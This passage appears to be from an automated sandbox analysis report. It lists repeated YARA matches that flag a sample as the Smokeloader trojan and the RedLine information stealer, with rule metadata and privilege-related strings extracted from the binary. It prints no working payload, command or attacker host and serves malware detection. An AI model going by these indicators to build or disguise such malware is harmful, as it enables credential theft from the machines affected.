                  Source: Yara match | File source: 0.0.file.exe.21c0e67.28.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.19.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.18.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.16.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.32.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.30.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.15.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.16.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.10.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.22.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.8.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.7.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.29.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.21.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.3.file.exe.2200000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.27.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.12.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.14.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.3.file.exe.2200000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.303645653.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.313758394.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.314053861.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.340099417.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.303166143.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.308578404.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.318572521.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.352139791.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.308973675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.339625229.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.337565462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.319567616.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.313553571.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.346627601.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.301103570.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.338909457.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.319176574.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.352775062.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.324752364.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.324022607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.352494062.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.345502074.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.346406888.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.313405136.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.308781752.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.318868933.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.345921160.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.324526447.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.302389344.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.351860425.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000000.302874171.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                  System Summary

                  Source: 00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.303645653.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.314053861.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.340099417.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.345695495.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.313966134.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.352618407.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.352139791.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.319401695.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.319567616.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.318795705.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.302663434.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.313553571.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.309109018.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.346627601.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.324683404.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.338909457.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.352775062.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.324752364.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.313496806.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.339850258.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.337744676.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.346524213.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.308781752.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.318868933.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.303421378.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.345921160.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.308709997.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.352027898.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.302874171.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.324186328.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: file.exe, 00000000.00000003.397979346.0000000003B38000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
                  Source: file.exe, 00000000.00000003.397181880.0000000003D3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
                  Source: soft[1].0.drString found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
                  Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.303645653.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.314053861.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.340099417.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.345695495.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.313966134.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.352618407.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.352139791.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.319401695.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.319567616.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.318795705.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.302663434.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.313553571.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.309109018.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.346627601.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.324683404.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.338909457.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.352775062.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.324752364.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.313496806.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.339850258.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.337744676.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.346524213.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
